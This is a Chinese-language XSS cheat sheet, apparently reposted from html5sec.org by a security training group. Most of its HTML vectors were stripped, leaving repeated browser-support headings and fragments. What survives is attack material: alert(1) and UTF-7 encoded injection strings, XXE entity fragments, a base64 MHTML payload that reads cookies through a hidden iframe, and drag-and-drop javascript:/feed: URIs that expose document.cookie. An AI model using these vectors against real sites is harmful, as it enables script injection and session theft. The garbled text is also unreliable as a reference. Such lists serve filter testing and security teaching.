XSS备忘录

HTML5特性向量

X

适用浏览器


适用浏览器


适用浏览器

![1-5](C:\picture\1-5.png)

适用浏览器







...



适用浏览器

X

适用浏览器

适用浏览器


适用浏览器

X

适用浏览器


适用浏览器

CLICKME



CLICKME


CLICKMEhttp://http://google.com

适用浏览器







适用浏览器


适用浏览器


适用浏览器






适用浏览器

CLICK // window.opener will be null

CLICK // window.opener will be null

CLICK // window.opener still works

// window.opener still works

CLICKME// window.opener still works

CLICKME// window.opener still works

适用浏览器



CLICK

适用浏览器

#Chrome, Opera, Safari and Edge
# Firefox
#MSIE10/11 & Edge #MSIE10
# MSIE11
# Chrome, Opera, Safari
# Chrome, Opera, Safari
# Safari

适用浏览器


适用浏览器


适用浏览器

HTML4和一些老的向量

适用浏览器


适用浏览器


适用浏览器


适用浏览器





><image xlink:href="

适用浏览器


适用浏览器


适用浏览器

XXX

适用浏览器

alert(1)

适用浏览器


适用浏览器


适用浏览器



 // Firefox only

适用浏览器

alert(1)//0

适用浏览器

 

适用浏览器







适用浏览器

 // O10.10↓, OM10.0↓, GC6↓, FF

 // IE6, O10.10↓, OM10.0↓
 // IE6, O11.01↓, OM10.1↓

适用浏览器

x

适用浏览器


适用浏览器

[A]
">
">
">
[B]
">
[C]
">
[D]
<% foo>">

适用浏览器



some content without two new line \n\n
Content-Type: multipart/related; boundary="******"some content without two new line
--******
Content-Location: xss.html
Content-Transfer-Encoding: base64

PGlmcmFtZSBuYW1lPWxvIHN0eWxlPWRpc3BsYXk6bm9uZT48L2lmcmFtZT4NCjxzY3JpcHQ+DQp1
cmw9bG9jYXRpb24uaHJlZjtkb2N1bWVudC5nZXRFbGVtZW50c0J5TmFtZSgnbG8nKVswXS5zcmM9
dXJsLnN1YnN0cmluZyg2LHVybC5pbmRleE9mKCcvJywxNSkpO3NldFRpbWVvdXQoImFsZXJ0KGZy
YW1lc1snbG8nXS5kb2N1bWVudC5jb29raWUpIiwyMDAwKTsNCjwvc2NyaXB0PiAgICAg
--******--


适用浏览器



适用浏览器































适用浏览器











适用浏览器



]>








适用浏览器



alert(1)

适用浏览器

适用浏览器


")'>


适用浏览器



适用浏览器






适用浏览器

适用浏览器

X(HT)ML相关向量

适用浏览器

alert(1)

适用浏览器

]>&x;
alert(1)

适用浏览器




适用浏览器


]>

适用浏览器


XXX

适用浏览器


适用浏览器

&x;

适用浏览器


适用浏览器










适用浏览器


适用浏览器


适用浏览器


适用浏览器


适用浏览器


alert(1)

适用浏览器




new ActiveXObject('htmlfile').parentWindow.alert(1)



适用浏览器

UTF-7和其它诡异的编码集的向量

&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi

适用浏览器

&alert&A7&(1)&R&UA;&&<&A9&11/script&X&>

适用浏览器

¼script ¾alert(1)//¼/script ¾

适用浏览器

客户端DOS向量

01

适用浏览器


适用浏览器


适用浏览器

HTML behavior和binding相关向量

X

适用浏览器

1

适用浏览器

1

适用浏览器

1


适用浏览器

1

适用浏览器

XXX

适用浏览器




alert(1)

适用浏览器





]]>

适用浏览器


适用浏览器

适用浏览器

x



适用浏览器

Clickjacking和UI Redressing的向量



适用浏览器


Drop me

适用浏览器




适用浏览器




Spam

适用浏览器












适用浏览器


适用浏览器

Some text
www.example.org



适用浏览器

drag and drop one of the following strings to the drop box:


jAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

feed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

feed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>

feed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//

+ Drop Box +

适用浏览器

原文链接:http://www.html5sec.org

Ms08067安全实验室

专注于普及网络安全知识。团队已出版《Web安全攻防:渗透测试实战指南》,《内网安全攻防:渗透测试实战指南》,目前在编Python渗透测试,JAVA代码审计和二进制逆向方面的书籍。

团队公众号定期分享关于CTF靶场、内网渗透、APT方面技术干货,从零开始、以实战落地为主,致力于做一个实用的干货分享型公众号。

官方网站:www.ms08067.com

你可能感兴趣的:(XSS备忘录)